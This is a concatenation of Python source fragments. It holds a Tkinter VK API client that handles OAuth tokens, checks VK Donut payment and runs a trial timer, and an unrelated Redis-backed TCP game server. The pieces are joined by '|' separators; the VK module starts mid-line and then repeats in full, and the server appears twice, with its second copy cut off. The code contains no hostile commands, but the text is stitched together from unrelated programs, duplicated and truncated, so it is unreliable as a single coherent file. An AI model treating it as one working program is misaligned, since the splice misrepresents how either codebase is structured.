        window_preview.geometry("%ix%i+%i+%i" % (x_img, y_img, x, y))
        Label(window_preview, image=png_preview).pack(side='top')
class ConfigureVkApi:
    """Sets up the tooling for VK API requests (user token + VkTools)."""

    def __init__(self, ignore_existing_token: bool = False):
        """Obtain/validate the user token and build a ``VkTools`` helper.

        On success ``self.token`` and ``self.vk_tool`` are set; on failure
        both end up as None.

        :param ignore_existing_token: when True, always request a fresh
            token instead of reusing the one stored in the database
        """
        self.logger = LOGGER('config_vk_api', 'vk_api')
        get_requests_db = GetRequestsToDB()
        user_data_table_value = get_requests_db.get_records(
            tb_name=get_requests_db.userdata, one_record=True,
            select=['access_token']
        )
        token = user_data_table_value['access_token']
        self.__additional_windows = AdditionalWindows
        if ignore_existing_token is False:
            if (token is None) or (token == DEFAULT_VALUE_FOR_BD):
                token = self.get_token()
        else:
            token = self.get_token()
        # BUG FIX: was ``or``, which let a missing/placeholder token reach
        # check_is_donat(); both conditions must hold for a usable token.
        if (token is not None) and (token != DEFAULT_VALUE_FOR_BD):
            is_donat = self.check_is_donat(token)
            if is_donat is False:
                token = None
        else:
            token = None
        self.token = token
        if self.token is not None:
            vk_session = vk_api.VkApi(token=self.token)
            self.vk_tool = vk_api.tools.VkTools(vk_session)
            if ignore_existing_token is True:
                showinfo(
                    'Авторизовались',
                    'Вы удачно авторизовались!'
                )
            self.logger.info('Получен vk_tool и сам токен')
        else:
            self.logger.error('vk_tool не удалось получить')
            self.vk_tool = None
        del get_requests_db, user_data_table_value

    def get_token(self) -> Union[str, None]:
        """Interactively obtain a user token and store it in the database.

        Opens the OAuth page in the browser, asks the user for the
        redirect URL, extracts the token and validates it via
        ``users.get``.

        :return: the token, or None when it could not be obtained
        """
        showinfo('Получение токена!', INFO_MSG['VK_API']['get_token'])
        web_open_new_tab(HTTP_GET_TOKEN)
        token = self.__additional_windows().get_token()
        token = self.preparation_final_token(token)
        if token == DEFAULT_VALUE_FOR_BD:
            # BUG FIX: was ``LOGGER.warning`` on the factory class instead
            # of the configured instance logger.
            self.logger.warning(
                'При выполнении функции get_token был получен невалидный токен'
            )
            return None
        params = {
            'v': VERSION_API,
            'access_token': token
        }
        try:
            request = requests.get(
                HTTP_FOR_REQUESTS.format(method='users.get'),
                params=params
            ).json()
        # BUG FIX: requests raises its own ConnectionError, which is NOT a
        # subclass of the builtin one the original code caught here.
        except requests.exceptions.ConnectionError:
            showerror(
                'Нет подключения',
                'Не возиожно авторизоваться, нетп подключения к интернету'
            )
            return None
        if request.get('error'):
            showerror(
                'Авторизация не удалась',
                'Неверный токен авторизации, произошла ошибка, '
                'повторите попытку'
            )
            return None
        update_requests_db = UpdateRequestsToDB()
        update_requests_db.update_table(
            tb_name=update_requests_db.userdata,
            update_row={'access_token': token}
        )
        del request
        return token

    @staticmethod
    def check_is_donat(token: str) -> bool:
        """Check whether the user pays for the program (VK Donut) or may
        still use the time-limited free trial.

        :param token: user access token
        :return: True when the app may run, False otherwise
        """
        params = {
            'v': VERSION_API,
            'access_token': token,
            'owner_id': ID_GROUP_VK
        }
        try:
            request = requests.get(
                HTTP_FOR_REQUESTS.format(method='donut.isDon'),
                params=params
            ).json()
        # BUG FIX: catch the requests exception, not only the builtin.
        except requests.exceptions.ConnectionError:
            showerror(
                'Нет подключения',
                'Невозможно авторизоваться, нет подключения к интернету'
            )
            return False
        if request.get('error'):
            showerror(
                'Ошибка',
                f'Произошла непредвиденная ошибка {request["error"]}'
            )
            # BUG FIX: the original fell through and crashed on
            # ``int(None)`` below; an API error means no access.
            return False
        response = request.get('response')
        if int(response) == 1:
            return True
        # Not a donator: fall back to the free trial window.
        get_requests_db = GetRequestsToDB()
        trial_start = get_requests_db.get_records(
            select=['start_free_version'], one_record=True,
            tb_name=get_requests_db.settings
        )['start_free_version']
        if trial_start is None:
            # First trial run: remember when it started.
            warning = WARNING_MSG['VK_API']['is_not_donat_free']
            showwarning(
                'Пробная версия!',
                warning.format(min=TIME_FREE_VERSION // 60)
            )
            start_free_version = time_now()
            update_request_db = UpdateRequestsToDB()
            update_request_db.update_table(
                tb_name=update_request_db.settings,
                update_row={'start_free_version': int(start_free_version)}
            )
            return True
        time_use_free_version = ceil(time_now()) - int(trial_start)
        if time_use_free_version >= TIME_FREE_VERSION:
            # Trial expired.
            showwarning(
                'Пробная версия!',
                WARNING_MSG['VK_API']['is_not_donat']
            )
            return False
        time_left = TIME_FREE_VERSION - time_use_free_version
        warning = WARNING_MSG['VK_API']['is_not_donat_free']
        showwarning(
            'Пробная версия!',
            warning.format(min=time_left // 60)
        )
        return True

    def preparation_final_token(self, token: str) -> str:
        """Extract the access token from the OAuth redirect URL.

        :param token: URL containing ``access_token=...``
        :return: the bare token, or ``DEFAULT_VALUE_FOR_BD`` when the URL
            could not be parsed
        """
        parts = token.split('access_token=')
        if len(parts) == 2:
            return parts[1].split('&')[0]
        showwarning(
            'Не смог распознать токен',
            WARNING_MSG['VK_API']['non_inspected_token']
        )
        self.logger.warning(
            'При выполнении preparation_final_token, не смог распознать токен'
        )
        return DEFAULT_VALUE_FOR_BD
if __name__ == '__main__':
    def __scheduler__() -> None:
        """Periodic job: force a GC pass and log memory usage around it.

        :return:
        """
        scheduler_logger = LOGGER('scheduler', 'main')
        size_last, peak = tracemalloc.get_traced_memory()
        size_last = size_last // 1024
        scheduler_logger.warning('Запускаю очситку мусора')
        gc.collect()
        size_now, size_peak = tracemalloc.get_traced_memory()
        size_now = size_now // 1024
        size_peak = size_peak // 1024
        scheduler_logger.warning(
            f'Использовалось: {size_last}Mib, Теперь: {size_now}Mib, '
            f'В пике: {size_peak}Mib'
        )

    # Borderless root window used as the splash screen.
    master = Tk()
    master.overrideredirect(True)
    error_logger = LOGGER('App', 'error')
    try:
        app_brain = BrainForApp(master)
    except SystemExit:
        # Normal application shutdown path.
        error_logger.info('Закрытие программы')
        pass
    except MemoryError as error:
        # Report out-of-memory with figures from tracemalloc.
        try:
            master.destroy()
        except TclError:
            pass
        size_now, peak = tracemalloc.get_traced_memory()
        size_now = size_now // 1024
        peak = peak // 1024
        showerror(
            'Ошибка',
            f'Недостаточно оперативной памяти!\n\nИспользуется: {size_now}Mib'
            f', В пике: {peak}Mib\n\n{error}'
        )
        error_logger.error(
            'Нехватка памяти: Используется - '
            f'{size_now}Mib, В пике - {peak}Mib --> {error}'
        )
    except BaseException as error:
        # Last-resort handler: surface anything unexpected to the user.
        try:
            master.destroy()
        except TclError:
            pass
        showerror(
            'Ошибка',
            f'Произошла непредвиденная ошибка\n\n{error}'
        )
        error_logger.error(
            f'{error}'
        )
| import gc
import os
import time
import tracemalloc
from math import ceil
from shutil import rmtree
from sys import exit as exit_ex
from sys import platform
from time import time as time_now
from tkinter import Label, Tk
from tkinter.messagebox import showerror, showinfo, showwarning
from typing import Union
from webbrowser import open_new_tab as web_open_new_tab
import requests
import vk_api
from _tkinter import TclError
from apscheduler.schedulers.background import BackgroundScheduler
from PIL import Image, ImageTk
from base_data import GetRequestsToDB, MainDB, UpdateRequestsToDB
from settings import (DEFAULT_VALUE_FOR_BD, HTTP_FOR_REQUESTS, HTTP_GET_TOKEN,
ID_GROUP_VK, INFO_MSG, LOGGER, REPO_BRANCH_MASTER,
REPO_BRANCH_UPDATER, REPO_BRANCH_VERSION,
TIME_FREE_VERSION, VERSION_API, WARNING_MSG, path,
path_to_dir_ico)
from windows import AdditionalWindows
# Map sys.platform onto the OS label the rest of the application uses;
# any other platform is reported to the user and the program exits.
_OS_BY_PLATFORM = {'linux': 'Linux', 'win32': 'Windows', 'cygwin': 'Windows'}
if platform in _OS_BY_PLATFORM:
    OS = _OS_BY_PLATFORM[platform]
else:
    showerror(
        'Платформа не поддерживается',
        f'Неподдерживаемая платформа: {platform}\n\nОбратитесь за помощью '
        'к боту VK'
    )
    exit_ex()
class BrainForApp:
    """Configures and launches the application: splash screen, database
    checks, first-start setup, directory cleanup, background scheduler
    and the main window."""

    def __init__(self, window_preview):
        """Show the preview window, run startup checks and start the app.

        :param window_preview: Tk window used as the splash screen
        """
        self.logger = LOGGER('main', 'main')
        png_preview_open, png_preview = self.preview_image_open()
        self.preview_image_set(png_preview_open, png_preview, window_preview)
        window_preview.update()
        # Memory tracing feeds the scheduler job and the top-level
        # error handler with usage figures.
        tracemalloc.start()
        time.sleep(2)
        # Ensures the database and its tables exist.
        MainDB()
        get_requests_db = GetRequestsToDB()
        settings = get_requests_db.get_records(
            tb_name=get_requests_db.settings, one_record=True,
            select=['first_start', 'auto_update']
        )
        first_start = settings['first_start']
        auto_update = settings['auto_update']
        if first_start == 1:
            # First launch: collect personal data / agreement before
            # clearing the first-start flag.
            self.logger.info('Первый запуск')
            window_preview.destroy()
            done = AdditionalWindows().person_and_agreement_data()
            if done is True:
                update_requests_db = UpdateRequestsToDB()
                update_requests_db.update_table(
                    tb_name=update_requests_db.settings,
                    update_row={'first_start': 0}
                )
        self.logger.warning('Очистка от лишних файлов в директории')
        # Drop leftover updater/version/master checkouts, if present.
        list_path = os.listdir(path)
        if REPO_BRANCH_UPDATER in list_path:
            rmtree(REPO_BRANCH_UPDATER, ignore_errors=True, onerror=None)
        if REPO_BRANCH_VERSION in list_path:
            rmtree(REPO_BRANCH_VERSION, ignore_errors=True, onerror=None)
        if REPO_BRANCH_MASTER in list_path:
            rmtree(REPO_BRANCH_MASTER, ignore_errors=True, onerror=None)
        try:
            self.logger.warning('Закрытие окна первью')
            window_preview.destroy()
        except TclError:
            # Already destroyed on the first-start path above.
            pass
        del settings, first_start, list_path, window_preview
        gc.collect()
        self.logger.info('Создание задачи scheduler')
        scheduler = BackgroundScheduler()
        scheduler.start()
        # __scheduler__ is defined in this module's __main__ guard.
        scheduler.add_job(__scheduler__, 'interval', minutes=1)
        self.logger.info('Запуск приложения')
        # Imported late — presumably to avoid a circular import; verify.
        from windows import App
        App(auto_update, OS)
        self.logger.info('Закрытие приложения')

    def preview_image_open(self):
        """Load the preview image; return (PIL image, Tk photo image).

        Retries until the file can be read, logging each failure.
        NOTE(review): loops forever if the file never appears.
        """
        while True:
            try:
                png_preview_open = Image.open(
                    os.path.join(path_to_dir_ico, 'preview.png')
                )
                png_preview = ImageTk.PhotoImage(png_preview_open)
                return png_preview_open, png_preview
            except FileNotFoundError as err:
                self.logger.error(str(err))

    @staticmethod
    def preview_image_set(png_preview_open, png_preview, window_preview):
        """Size the window to the image, center it on screen and install
        the image as the window background."""
        x_img, y_img = png_preview_open.size
        x = (window_preview.winfo_screenwidth() - x_img) // 2
        y = (window_preview.winfo_screenheight() - y_img) // 2
        window_preview.geometry("%ix%i+%i+%i" % (x_img, y_img, x, y))
        Label(window_preview, image=png_preview).pack(side='top')
class ConfigureVkApi:
    """Sets up the tooling for VK API requests (user token + VkTools)."""

    def __init__(self, ignore_existing_token: bool = False):
        """Obtain/validate the user token and build a ``VkTools`` helper.

        On success ``self.token`` and ``self.vk_tool`` are set; on failure
        both end up as None.

        :param ignore_existing_token: when True, always request a fresh
            token instead of reusing the one stored in the database
        """
        self.logger = LOGGER('config_vk_api', 'vk_api')
        get_requests_db = GetRequestsToDB()
        user_data_table_value = get_requests_db.get_records(
            tb_name=get_requests_db.userdata, one_record=True,
            select=['access_token']
        )
        token = user_data_table_value['access_token']
        self.__additional_windows = AdditionalWindows
        if ignore_existing_token is False:
            if (token is None) or (token == DEFAULT_VALUE_FOR_BD):
                token = self.get_token()
        else:
            token = self.get_token()
        # BUG FIX: was ``or``, which let a missing/placeholder token reach
        # check_is_donat(); both conditions must hold for a usable token.
        if (token is not None) and (token != DEFAULT_VALUE_FOR_BD):
            is_donat = self.check_is_donat(token)
            if is_donat is False:
                token = None
        else:
            token = None
        self.token = token
        if self.token is not None:
            vk_session = vk_api.VkApi(token=self.token)
            self.vk_tool = vk_api.tools.VkTools(vk_session)
            if ignore_existing_token is True:
                showinfo(
                    'Авторизовались',
                    'Вы удачно авторизовались!'
                )
            self.logger.info('Получен vk_tool и сам токен')
        else:
            self.logger.error('vk_tool не удалось получить')
            self.vk_tool = None
        del get_requests_db, user_data_table_value

    def get_token(self) -> Union[str, None]:
        """Interactively obtain a user token and store it in the database.

        Opens the OAuth page in the browser, asks the user for the
        redirect URL, extracts the token and validates it via
        ``users.get``.

        :return: the token, or None when it could not be obtained
        """
        showinfo('Получение токена!', INFO_MSG['VK_API']['get_token'])
        web_open_new_tab(HTTP_GET_TOKEN)
        token = self.__additional_windows().get_token()
        token = self.preparation_final_token(token)
        if token == DEFAULT_VALUE_FOR_BD:
            # BUG FIX: was ``LOGGER.warning`` on the factory class instead
            # of the configured instance logger.
            self.logger.warning(
                'При выполнении функции get_token был получен невалидный токен'
            )
            return None
        params = {
            'v': VERSION_API,
            'access_token': token
        }
        try:
            request = requests.get(
                HTTP_FOR_REQUESTS.format(method='users.get'),
                params=params
            ).json()
        # BUG FIX: requests raises its own ConnectionError, which is NOT a
        # subclass of the builtin one the original code caught here.
        except requests.exceptions.ConnectionError:
            showerror(
                'Нет подключения',
                'Не возиожно авторизоваться, нетп подключения к интернету'
            )
            return None
        if request.get('error'):
            showerror(
                'Авторизация не удалась',
                'Неверный токен авторизации, произошла ошибка, '
                'повторите попытку'
            )
            return None
        update_requests_db = UpdateRequestsToDB()
        update_requests_db.update_table(
            tb_name=update_requests_db.userdata,
            update_row={'access_token': token}
        )
        del request
        return token

    @staticmethod
    def check_is_donat(token: str) -> bool:
        """Check whether the user pays for the program (VK Donut) or may
        still use the time-limited free trial.

        :param token: user access token
        :return: True when the app may run, False otherwise
        """
        params = {
            'v': VERSION_API,
            'access_token': token,
            'owner_id': ID_GROUP_VK
        }
        try:
            request = requests.get(
                HTTP_FOR_REQUESTS.format(method='donut.isDon'),
                params=params
            ).json()
        # BUG FIX: catch the requests exception, not only the builtin.
        except requests.exceptions.ConnectionError:
            showerror(
                'Нет подключения',
                'Невозможно авторизоваться, нет подключения к интернету'
            )
            return False
        if request.get('error'):
            showerror(
                'Ошибка',
                f'Произошла непредвиденная ошибка {request["error"]}'
            )
            # BUG FIX: the original fell through and crashed on
            # ``int(None)`` below; an API error means no access.
            return False
        response = request.get('response')
        if int(response) == 1:
            return True
        # Not a donator: fall back to the free trial window.
        get_requests_db = GetRequestsToDB()
        trial_start = get_requests_db.get_records(
            select=['start_free_version'], one_record=True,
            tb_name=get_requests_db.settings
        )['start_free_version']
        if trial_start is None:
            # First trial run: remember when it started.
            warning = WARNING_MSG['VK_API']['is_not_donat_free']
            showwarning(
                'Пробная версия!',
                warning.format(min=TIME_FREE_VERSION // 60)
            )
            start_free_version = time_now()
            update_request_db = UpdateRequestsToDB()
            update_request_db.update_table(
                tb_name=update_request_db.settings,
                update_row={'start_free_version': int(start_free_version)}
            )
            return True
        time_use_free_version = ceil(time_now()) - int(trial_start)
        if time_use_free_version >= TIME_FREE_VERSION:
            # Trial expired.
            showwarning(
                'Пробная версия!',
                WARNING_MSG['VK_API']['is_not_donat']
            )
            return False
        time_left = TIME_FREE_VERSION - time_use_free_version
        warning = WARNING_MSG['VK_API']['is_not_donat_free']
        showwarning(
            'Пробная версия!',
            warning.format(min=time_left // 60)
        )
        return True

    def preparation_final_token(self, token: str) -> str:
        """Extract the access token from the OAuth redirect URL.

        :param token: URL containing ``access_token=...``
        :return: the bare token, or ``DEFAULT_VALUE_FOR_BD`` when the URL
            could not be parsed
        """
        parts = token.split('access_token=')
        if len(parts) == 2:
            return parts[1].split('&')[0]
        showwarning(
            'Не смог распознать токен',
            WARNING_MSG['VK_API']['non_inspected_token']
        )
        self.logger.warning(
            'При выполнении preparation_final_token, не смог распознать токен'
        )
        return DEFAULT_VALUE_FOR_BD
if __name__ == '__main__':
    def __scheduler__() -> None:
        """Periodic job: force a GC pass and log memory usage around it.

        :return:
        """
        scheduler_logger = LOGGER('scheduler', 'main')
        size_last, peak = tracemalloc.get_traced_memory()
        size_last = size_last // 1024
        scheduler_logger.warning('Запускаю очситку мусора')
        gc.collect()
        size_now, size_peak = tracemalloc.get_traced_memory()
        size_now = size_now // 1024
        size_peak = size_peak // 1024
        scheduler_logger.warning(
            f'Использовалось: {size_last}Mib, Теперь: {size_now}Mib, '
            f'В пике: {size_peak}Mib'
        )

    # Borderless root window used as the splash screen.
    master = Tk()
    master.overrideredirect(True)
    error_logger = LOGGER('App', 'error')
    try:
        app_brain = BrainForApp(master)
    except SystemExit:
        # Normal application shutdown path.
        error_logger.info('Закрытие программы')
        pass
    except MemoryError as error:
        # Report out-of-memory with figures from tracemalloc.
        try:
            master.destroy()
        except TclError:
            pass
        size_now, peak = tracemalloc.get_traced_memory()
        size_now = size_now // 1024
        peak = peak // 1024
        showerror(
            'Ошибка',
            f'Недостаточно оперативной памяти!\n\nИспользуется: {size_now}Mib'
            f', В пике: {peak}Mib\n\n{error}'
        )
        error_logger.error(
            'Нехватка памяти: Используется - '
            f'{size_now}Mib, В пике - {peak}Mib --> {error}'
        )
    except BaseException as error:
        # Last-resort handler: surface anything unexpected to the user.
        try:
            master.destroy()
        except TclError:
            pass
        showerror(
            'Ошибка',
            f'Произошла непредвиденная ошибка\n\n{error}'
        )
        error_logger.error(
            f'{error}'
        )
|
import importlib
import threading
import socket
import logging
import time
import redis
import exceptions
from client import Client
from inventory import Inventory
from parser import Parser
# Handler modules loaded by Server; each contributes one command prefix.
# BUG FIX: "user_rating" appeared twice — the import was cached, but its
# handler class was instantiated twice and overwrote itself.
modules = ["client_error", "house", "outside", "user_rating", "mail", "avatar",
           "location_game", "relations", "social_request",
           "competition", "furniture", "billing", "component", "support"]
class Server():
    """TCP game server.

    Accepts socket connections, authenticates clients against Redis and
    dispatches framed commands to pluggable handler modules keyed by
    command prefix.
    """

    def __init__(self, host="0.0.0.0", port=8123):
        # Currently authenticated clients.
        self.online = []
        # uid -> Inventory cache; pruned by the background thread.
        self.inv = {}
        self.redis = redis.Redis(decode_responses=True)
        self.parser = Parser()
        self.clothes = self.parser.parse_clothes()
        self.conflicts = self.parser.parse_conflicts()
        # Import every handler module and index its class by prefix.
        self.modules = {}
        for item in modules:
            module = importlib.import_module(f"modules.{item}")
            class_ = getattr(module, module.class_name)
            self.modules[class_.prefix] = class_(self)
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))

    def listen(self):
        """Start the maintenance thread, then serve forever with one
        daemon thread per accepted connection."""
        self.sock.listen(5)
        logging.info("Server is ready to accept connections")
        thread = threading.Thread(target=self._background)
        thread.daemon = True
        thread.start()
        while True:
            client, address = self.sock.accept()
            thread = threading.Thread(target=Client(self).handle,
                                      args=(client, address))
            thread.daemon = True
            thread.start()

    def process_data(self, data, client):
        """Route one decoded frame from *client*.

        Type 1 is authentication, type 2 a disconnect request, type 34 a
        prefixed command handled by a module.
        """
        if not client.uid:
            # Unauthenticated clients may only send auth frames.
            if data["type"] != 1:
                client.connection.close()
                # NOTE(review): auth() is still called below even after
                # closing the connection — looks like a missing return;
                # confirm intended behavior.
            self.auth(data["msg"], client)
            return
        if data["type"] == 2:
            client.connection.close()
            return
        elif data["type"] == 34:
            prefix = data["msg"][1].split(".")[0]
            if prefix not in self.modules:
                logging.warning(f"Command {data["msg"][1]} not found")
                return
            self.modules[prefix].on_message(data["msg"], client)

    def auth(self, msg, client):
        """Authenticate *client* via its session key (msg[2]) in Redis.

        Kicks any existing connection with the same uid, records the
        last-visit timestamp and primes/keeps the inventory cache.
        """
        uid = self.redis.get(f"auth:{msg[2]}")
        if not uid:
            client.connection.close()
            return
        # Enforce a single live connection per uid.
        for tmp in self.online:
            if tmp.uid == uid:
                tmp.connection.close()
                break
        client.uid = uid
        self.online.append(client)
        self.redis.set(f"uid:{uid}:lvt", int(time.time()))
        if uid not in self.inv:
            self.inv[uid] = Inventory(self, uid)
        else:
            # Reconnected before expiry: cancel the pending eviction.
            self.inv[uid].expire = None
        client.send([client.uid, True, False, False], type_=1)
        client.checksummed = True

    def get_user_data(self, uid):
        """Fetch the user's core counters from Redis in one round trip.

        Returns None when the user does not exist (no slvr entry).
        Missing crt/hrt values are recomputed via the stub updaters.
        """
        pipe = self.redis.pipeline()
        # redis-py pipeline commands return the pipeline, so calls chain.
        pipe.get(f"uid:{uid}:slvr").get(f"uid:{uid}:enrg")
        pipe.get(f"uid:{uid}:gld").get(f"uid:{uid}:exp").get(f"uid:{uid}:emd")
        pipe.get(f"uid:{uid}:lvt").get(f"uid:{uid}:trid").get(f"uid:{uid}:crt")
        pipe.get(f"uid:{uid}:hrt").get(f"uid:{uid}:role")
        result = pipe.execute()
        if not result[0]:
            return None
        if result[7]:
            crt = int(result[7])
        else:
            crt = self.update_crt(uid)
        if result[8]:
            hrt = int(result[8])
        else:
            hrt = self.update_hrt(uid)
        if result[9]:
            role = int(result[9])
        else:
            role = 0
        return {"uid": uid, "slvr": int(result[0]), "enrg": int(result[1]),
                "gld": int(result[2]), "exp": int(result[3]),
                "emd": int(result[4]), "lvt": int(result[5]), "crt": crt,
                "hrt": hrt, "trid": result[6], "role": role}

    def get_appearance(self, uid):
        """Return the avatar appearance dict, or False when unset.

        The Redis list layout (indices 0..24) is fixed: index 0 is the
        display name, the rest are integer style/color codes.
        """
        apprnc = self.redis.lrange(f"uid:{uid}:appearance", 0, -1)
        if not apprnc:
            return False
        return {"n": apprnc[0], "nct": int(apprnc[1]), "g": int(apprnc[2]),
                "sc": int(apprnc[3]), "ht": int(apprnc[4]),
                "hc": int(apprnc[5]), "brt": int(apprnc[6]),
                "brc": int(apprnc[7]), "et": int(apprnc[8]),
                "ec": int(apprnc[9]), "fft": int(apprnc[10]),
                "fat": int(apprnc[11]), "fac": int(apprnc[12]),
                "ss": int(apprnc[13]), "ssc": int(apprnc[14]),
                "mt": int(apprnc[15]), "mc": int(apprnc[16]),
                "sh": int(apprnc[17]), "shc": int(apprnc[18]),
                "rg": int(apprnc[19]), "rc": int(apprnc[20]),
                "pt": int(apprnc[21]), "pc": int(apprnc[22]),
                "bt": int(apprnc[23]), "bc": int(apprnc[24])}

    def get_clothes(self, uid, type_):
        """Return worn clothes in one of three wire formats.

        type_ 1: collection dict, 2: list of tpid/clid dicts,
        3: bare "tpid:clid" strings.
        NOTE(review): an unknown type_ leaves ``clths`` unbound and the
        final return raises NameError — confirm callers only pass 1..3.
        """
        clothes = []
        for item in self.redis.smembers(f"uid:{uid}:wearing"):
            # Set entries are "tpid" or "tpid_clid" (with color id).
            if "_" in item:
                id_, clid = item.split("_")
                clothes.append({"id": id_, "clid": clid})
            else:
                clothes.append({"id": item, "clid": None})
        if type_ == 1:
            clths = {"cc": "casual", "ccltns": {"casual": {"cct": [],
                                                           "cn": "",
                                                           "ctp": "casual"}}}
            for item in clothes:
                if item["clid"]:
                    clths["ccltns"]["casual"]["cct"].append(f"{item["id"]}:"
                                                            f"{item["clid"]}")
                else:
                    clths["ccltns"]["casual"]["cct"].append(item["id"])
        elif type_ == 2:
            clths = {"clths": []}
            for item in clothes:
                clths["clths"].append({"tpid": item["id"],
                                       "clid": item["clid"]})
        elif type_ == 3:
            clths = {"cct": []}
            for item in clothes:
                if item["clid"]:
                    clths["cct"].append(f"{item["id"]}:{item["clid"]}")
                else:
                    clths["cct"].append(item["id"])
        return clths

    def get_room_items(self, uid, room):
        """Return furniture placed in *room*.

        Raises WrongRoom when the room name contains the reserved "_"
        separator used in item keys.
        """
        if "_" in room:
            raise exceptions.WrongRoom()
        items = []
        for name in self.redis.smembers(f"rooms:{uid}:{room}:items"):
            item = self.redis.lrange(f"rooms:{uid}:{room}:items:{name}", 0, -1)
            # Set members are "tpid_lid"; the list holds x/y/z/d (+rid).
            name, lid = name.split("_")
            if len(item) == 5:
                items.append({"tpid": name, "x": float(item[0]),
                              "y": float(item[1]), "z": float(item[2]),
                              "d": int(item[3]), "lid": int(lid),
                              "rid": item[4]})
            else:
                items.append({"tpid": name, "x": float(item[0]),
                              "y": float(item[1]), "z": float(item[2]),
                              "d": int(item[3]), "lid": int(lid)})
        return items

    def update_crt(self, uid):
        """Stub: recompute the crt counter; currently always 0."""
        logging.warning("stub update_crt")
        return 0

    def update_hrt(self, uid):
        """Stub: recompute the hrt counter; currently always 0."""
        logging.warning("stub update_hrt")
        return 0

    def _background(self):
        """Maintenance loop: log the online count and evict expired
        inventory caches once a minute."""
        while True:
            logging.info(f"Players online: {len(self.online)}")
            # Iterate over a copy — entries may be deleted while looping.
            for uid in self.inv.copy():
                inv = self.inv[uid]
                if inv.expire and time.time() - inv.expire > 0:
                    del self.inv[uid]
            time.sleep(60)
if __name__ == "__main__":
    # Configure root logging before the server emits anything.
    log_format = "%(levelname)-8s [%(asctime)s] %(message)s"
    logging.basicConfig(format=log_format,
                        datefmt="%H:%M:%S", level=logging.DEBUG)
    server = Server()
    server.listen()
| import importlib
import threading
import socket
import logging
import time
import redis
import exceptions
from client import Client
from inventory import Inventory
from parser import Parser
# Handler modules loaded by Server; each contributes one command prefix.
# BUG FIX: "user_rating" appeared twice — the import was cached, but its
# handler class was instantiated twice and overwrote itself.
modules = ["client_error", "house", "outside", "user_rating", "mail", "avatar",
           "location_game", "relations", "social_request",
           "competition", "furniture", "billing", "component", "support"]
class Server():
    """TCP game server.

    Accepts socket connections, authenticates clients against Redis and
    dispatches framed commands to pluggable handler modules keyed by
    command prefix.
    """

    def __init__(self, host="0.0.0.0", port=8123):
        # Currently authenticated clients.
        self.online = []
        # uid -> Inventory cache; pruned by the background thread.
        self.inv = {}
        self.redis = redis.Redis(decode_responses=True)
        self.parser = Parser()
        self.clothes = self.parser.parse_clothes()
        self.conflicts = self.parser.parse_conflicts()
        # Import every handler module and index its class by prefix.
        self.modules = {}
        for item in modules:
            module = importlib.import_module(f"modules.{item}")
            class_ = getattr(module, module.class_name)
            self.modules[class_.prefix] = class_(self)
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))

    def listen(self):
        """Start the maintenance thread, then serve forever with one
        daemon thread per accepted connection."""
        self.sock.listen(5)
        logging.info("Server is ready to accept connections")
        thread = threading.Thread(target=self._background)
        thread.daemon = True
        thread.start()
        while True:
            client, address = self.sock.accept()
            thread = threading.Thread(target=Client(self).handle,
                                      args=(client, address))
            thread.daemon = True
            thread.start()

    def process_data(self, data, client):
        """Route one decoded frame from *client*.

        Type 1 is authentication, type 2 a disconnect request, type 34 a
        prefixed command handled by a module.
        """
        if not client.uid:
            # Unauthenticated clients may only send auth frames.
            if data["type"] != 1:
                client.connection.close()
                # NOTE(review): auth() is still called below even after
                # closing the connection — looks like a missing return;
                # confirm intended behavior.
            self.auth(data["msg"], client)
            return
        if data["type"] == 2:
            client.connection.close()
            return
        elif data["type"] == 34:
            prefix = data["msg"][1].split(".")[0]
            if prefix not in self.modules:
                logging.warning(f"Command {data['msg'][1]} not found")
                return
            self.modules[prefix].on_message(data["msg"], client)

    def auth(self, msg, client):
        """Authenticate *client* via its session key (msg[2]) in Redis.

        Kicks any existing connection with the same uid, records the
        last-visit timestamp and primes/keeps the inventory cache.
        """
        uid = self.redis.get(f"auth:{msg[2]}")
        if not uid:
            client.connection.close()
            return
        # Enforce a single live connection per uid.
        for tmp in self.online:
            if tmp.uid == uid:
                tmp.connection.close()
                break
        client.uid = uid
        self.online.append(client)
        self.redis.set(f"uid:{uid}:lvt", int(time.time()))
        if uid not in self.inv:
            self.inv[uid] = Inventory(self, uid)
        else:
            # Reconnected before expiry: cancel the pending eviction.
            self.inv[uid].expire = None
        client.send([client.uid, True, False, False], type_=1)
        client.checksummed = True

    def get_user_data(self, uid):
        """Fetch the user's core counters from Redis in one round trip.

        Returns None when the user does not exist (no slvr entry).
        Missing crt/hrt values are recomputed via the stub updaters.
        """
        pipe = self.redis.pipeline()
        # redis-py pipeline commands return the pipeline, so calls chain.
        pipe.get(f"uid:{uid}:slvr").get(f"uid:{uid}:enrg")
        pipe.get(f"uid:{uid}:gld").get(f"uid:{uid}:exp").get(f"uid:{uid}:emd")
        pipe.get(f"uid:{uid}:lvt").get(f"uid:{uid}:trid").get(f"uid:{uid}:crt")
        pipe.get(f"uid:{uid}:hrt").get(f"uid:{uid}:role")
        result = pipe.execute()
        if not result[0]:
            return None
        if result[7]:
            crt = int(result[7])
        else:
            crt = self.update_crt(uid)
        if result[8]:
            hrt = int(result[8])
        else:
            hrt = self.update_hrt(uid)
        if result[9]:
            role = int(result[9])
        else:
            role = 0
        return {"uid": uid, "slvr": int(result[0]), "enrg": int(result[1]),
                "gld": int(result[2]), "exp": int(result[3]),
                "emd": int(result[4]), "lvt": int(result[5]), "crt": crt,
                "hrt": hrt, "trid": result[6], "role": role}

    def get_appearance(self, uid):
        """Return the avatar appearance dict, or False when unset.

        The Redis list layout (indices 0..24) is fixed: index 0 is the
        display name, the rest are integer style/color codes.
        """
        apprnc = self.redis.lrange(f"uid:{uid}:appearance", 0, -1)
        if not apprnc:
            return False
        return {"n": apprnc[0], "nct": int(apprnc[1]), "g": int(apprnc[2]),
                "sc": int(apprnc[3]), "ht": int(apprnc[4]),
                "hc": int(apprnc[5]), "brt": int(apprnc[6]),
                "brc": int(apprnc[7]), "et": int(apprnc[8]),
                "ec": int(apprnc[9]), "fft": int(apprnc[10]),
                "fat": int(apprnc[11]), "fac": int(apprnc[12]),
                "ss": int(apprnc[13]), "ssc": int(apprnc[14]),
                "mt": int(apprnc[15]), "mc": int(apprnc[16]),
                "sh": int(apprnc[17]), "shc": int(apprnc[18]),
                "rg": int(apprnc[19]), "rc": int(apprnc[20]),
                "pt": int(apprnc[21]), "pc": int(apprnc[22]),
                "bt": int(apprnc[23]), "bc": int(apprnc[24])}

